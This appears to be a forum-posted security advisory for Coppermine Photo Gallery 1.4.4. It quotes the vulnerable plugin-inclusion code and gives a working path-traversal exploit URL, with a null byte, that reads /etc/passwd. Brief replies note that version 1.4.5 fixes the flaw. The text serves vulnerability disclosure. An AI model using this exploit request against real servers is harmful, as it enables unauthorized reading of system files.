Software: CPG Coppermine Photo Gallery Sowtware’s Web Site: http://coppermine.sourceforge.net/ Versions: 1.4.4.stable Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei addmimistrator Risk Level: High —————–Description————— There is a security flaw in Coppermine Photo Gallery, one of popular photo galleries in internet, that allows attacker perform a Remote File inclusion attack. bug is in a security flaw in plugin inclusion system.this system do not propely validate parameter $_GET[’file’] and have a simple removing speacial char mechanism that is evasionable easy. ————–See Also—————— file:{index.php}39 $file = str_replace(’//’,'’,str_replace(’..’,'’,$_GET[’file’])); $path = ‘./plugins/’.$file.’.php’; // Don’t include the codebase and credits files if ($file != ‘codebase’ && $file != ‘configuration’ && file_exists($path)) { // Include the code from the plugin include_once($path); $file = true; } ————–Exploit———————- /cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00 ————–Credit———————– Discovered by: imei addmimistrator addmimistrator(4}gmail(O}com imei(4}Kapda(O}IR www.myimei.com myimei.com/security
stuart pls bump, thank you
1.4.5 is out to fix this directory traversal attack
in CVS
